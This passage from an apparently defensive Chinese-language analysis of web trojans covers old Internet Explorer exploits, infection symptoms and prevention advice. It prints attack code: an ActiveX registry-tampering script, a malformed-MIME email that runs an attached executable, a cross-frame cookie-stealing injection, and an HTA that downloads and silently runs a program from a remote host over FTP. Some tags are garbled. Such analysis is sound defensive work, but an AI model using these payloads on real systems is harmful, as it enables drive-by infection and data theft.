五、目前常用的网页木马制作方式
1.Javascript.Exception.Exploit
利用JS+WSH的完美结合,来制作恶意网页。
2.错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头.几乎是现在网页木马流行利用的基本趋势,这个漏洞在IE5.0到IE6.0版本中都有。
3.EXE to .BMP + Javascritp.Exception.Exploit用虚假的BMP文件诱惑用户运行。
4.8))e 漏洞的利用
当微软的IE窗口打开另一个窗口时,如果子窗口是另一个域或安全区的话,安全检查应当阻止父窗口访问子窗口。但事实并非如此,父窗口可以访问子窗口文档的frame,这可能导致父窗口无论是域或安全区都能在子窗口中设置Frame或8))e的URL。这会带来严重的安全问题,通过设置URL指向javascript协议,父窗口能在子域环境下运行脚本代码,包括任意的恶意代码。攻击者也能在“我的电脑”区域中运行脚本代码。这更会造成严重的后果。
5.通过安全认证的CAB,COX
此类方法就是在.CAB文件上做手脚,使证书.SPC和密钥.PVK合法
原理:IE读文件时会有文件读不出,就会去“升级”这样它会在网页中指定的位找 .cab 并在系统里写入个CID读入.cab里的文件。
方法:.cab是WINDOWS里的压缩文件, IE里所用的安全文件是用签名的,CAB也不例外,所做的CAB是经过安全使用证书引入的。也就是说IE认证攻击,之所以每次都能入侵,是因为它通过的是IE认证下的安全攻击。
6.EXE文件的捆绑
现在的网页木马捆绑机几乎是开始泛滥了,多的数不胜数。再将生成的MHT文件进行加密。六、常用网页木马运行原理的分析
1.Javascript.Exception.Exploit
常用的攻击代码:
<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
Function destroy(){
try
{
//ActiveX initialization 初始化ActiveX,为修改注册表做准备
a1=document.applets[0];
//获取applet运行对象,以下语句指向注册表中有关IE的表项
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
开始进行破坏
}
}
catch(e)
{}
}
catch(e)
{}
}
function do()
{
//初始化函数,并每隔一秒执行修改程序
setTimeout("destroy()", 1000); //设定运行时间1秒
}
Do() //进行破坏的执行函数指令
这个代码是JAVAScript编写,很简单,但却可以修改受影响系统的注册表,释放极品文件,格式化硬盘等。
2.错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头
常用的攻击代码:
<! - - x.eml - - >
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====B===="
--====B====
Content-Type: multipart/alternative;
boundary="====A===="
--====A====
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<8))e src=3Dcid:Mud height=3D0 width=3D0></8))e>
--====A====--
--====B====
Content-Type: audio/x-wav;
name="run.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud> ---以下省略AAAAA N+1个---
把run.exe的类型定义为audio/x-wav,这是利用客户端支持的 MIME(多部分网际邮件扩展,Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件的类型audio/x-wav时,IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,,结果导致邮件文件x.eml中的附件run.exe被执行。在win2000上,即使是用鼠标点击下载下来的 x.eml,或是拷贝粘贴,都会导致x.eml中的附件被运行。整个程序的运行还是依靠x.eml这个文件来支持。Content-Transfer-Encoding: base64 Content-ID: <Mud> 从中可以看出,由于定义后字符格式为base64,那么一下的代码全部为加密过的代码,里面可以是任何执行的命令:
〈script language=vbs〉
On Error Resume Next• 容错语句,避免程序崩溃
set aa=CreateObject("WScript.Shell")•建立WScript对象
Set fs = CreateObject("Scripting.FileSystemObject")•建立文件系统对象
Set dir1 = fs.GetSpecialFolder(0)•得到Windows路径
Set dir2 = fs.GetSpecialFolder(1)•得到System路径
……省略……</script>
之所以有的病毒不能准确的清除全部的病毒体,是因为很多杀毒软件,病毒监控只杀当时查到的,却不能处理新建的文件。
3.8))e 漏洞的利用
常用攻击代码:
(1)
<script language="jscript">
onload=function () {
var
oVictim=open("http://url.url.com/url?threadm=vir","OurVi
ctim","width=100,height=100");
setTimeout(
function () {
oVictim.frames[0].location.href="javascript:alert(document.cooki
e)";
},
7000
);
}
</script>
(2)
〈8))e src=../../run.eml width=0 height=0〉〈/8))e〉
常见的木马运用格式,高度和宽度为0的一个框架网页。
(3)
<object type="text/x-scriptlet" width="0" height="0" data="test.html"></object>
一个框架引用的新方式,对type="text/x-scriptlet" 的调整后,就可以实现和eml格式文件同样的效果。
4.Microsoft Internet Explorer浏览器弹出窗口Object类型验证漏洞的利用
常见攻击代码:
<object data="run.asp"></object>
----- code cut start for run.asp -----
<HTA:APPLICATION caption="no" border="none" showInTaskBar="no" windowState="minimize">
<object id=';wsh'; classid=';clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B';></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject") //注册组件FSO
Set t = fs.CreateTextFile("ftp.txt",True)
t.WriteLine("userdown")
t.WriteLine("username")
t.WriteLine("usepassword")
t.WriteLine("get ie.exe c:window.exe") //FTP下载一个文件,并进行伪装
t.WriteLine("close")
t.WriteLine("quit")
t.Close
wsh.Run "ftp -n -s:ftp.txt URL.url.com",0,true
wsh.Run "c:window.exe" //下载完毕后就运行
fs.DeleteFile "ftp.txt",true //下载列表文件用完就删
window.close //窗口关闭,所有任务结束
</script>
----- code cut end for run.asp -----
七、网页木马运行后特征分析
1.系统的默认主页被更改,并且IE工具栏内的修改功能被屏蔽掉;
2.在系统的桌面上无故出现陌生网站的链接,无论怎么删除,每次开机都依旧会出现,如果单击鼠标右键,出现的工具栏中有也会有大量陌生网站的链接;
3.系统桌面及桌面上的图标被隐藏;
4.注册表编辑器被锁定,从而无法修改注册表;
5.上网之前,系统一切正常,下网之后系统就会出现异常情况,如系统盘丢失、硬盘遭到格式化等;
6.上陌生网站后,出现提示框“您已经被XX病毒攻击”,之后系统出现异常;
7.登陆站点后,出现一个窗口迅速打开后又消失的现象,系统文件夹内出现异常文件;
8.系统的进程中出现未知进程,而且无法终止,终止后会自动重新出现;
9.系统CPU占用率高;
10.登陆某站点后,杀毒监控软件报警,并删除病毒文件,位置在IE的缓冲区。重新启动计算机后发现IE默认设置被修改。
11.自动弹出广告;
12.信用卡,QQ帐号丢失等;八、网页木马的预防
1. 避免浏览包含不健康内容的网页;
2. 由于网页木马是含有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止。
具体方法是:在IE窗口中点击"工具→Internet选项,在弹出的对话框中选择"安全"标签,再点击"自定义级别"按钮,就会弹出"安全设置"对话框,把其中所有ActiveX插件和控件以及Java相关全部选择"禁用"即可。不过,这样在网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。
3.对Windows 2000和WINDOWS XP用户,还可以通过在服务里,禁用远程注册表操作服务"Remote Registry Service",来对付该类网页。具体方法是:点击"管理工具→服务→Remote Registry Service(允许远程注册表操作)",禁用即可。
4.升级浏览器到IE6.0并及时安装升级补丁。
5.下载微软最新的Microsoft Windows Script
6. 安装反病毒软件以及防火墙,打开网页监控和脚本监控.
后记:
网页木马,目前的发展方向,是利用操作系统,浏览器存在的溢出漏洞,来下载Trojan-Downloader类木马,达到传播病毒的目的。而网页木马的传播方式,目前,主要是黑客攻击知名网站,在代码中填加恶意脚本,从而达到,利用知名网站,访问量高的特点,快速传播的目的。网页木马本身的危害巨大,但它带来的最大影响,是可能传播恶性的病毒,造成极大的危害。
通过最近的这些病毒分析,现在越来越多的入侵者采取网页挂马,来达到控制更多的“肉鸡”从而达到,靠流量和贩卖“肉鸡”来达到收入最大话,通过网站钓鱼,来捕获受害人的信用卡帐号以及个人隐私,更有甚者进行非法交易,出卖给一些商业间谍等,以后的病毒防范和研究工作还将继续进行下去,任重而道远。
欢迎大家和我交流,我们一同来打一场反黑反病毒的持久战,同时在这里我还是要感谢安天实验室的全体cert组成员,能全力支持我,配合我来更快更好的完成病毒分析工作,也同样感谢我的两个助手-----王清,王琪,以及诚信网安的全体成员,谢谢你们对我工作的支持和帮助。
|
选择关键字查询
免费冲印照片
产品推荐
|
背景:
阅读内容
相关新闻
网页木马
本文评论
全部评论
发表评论
|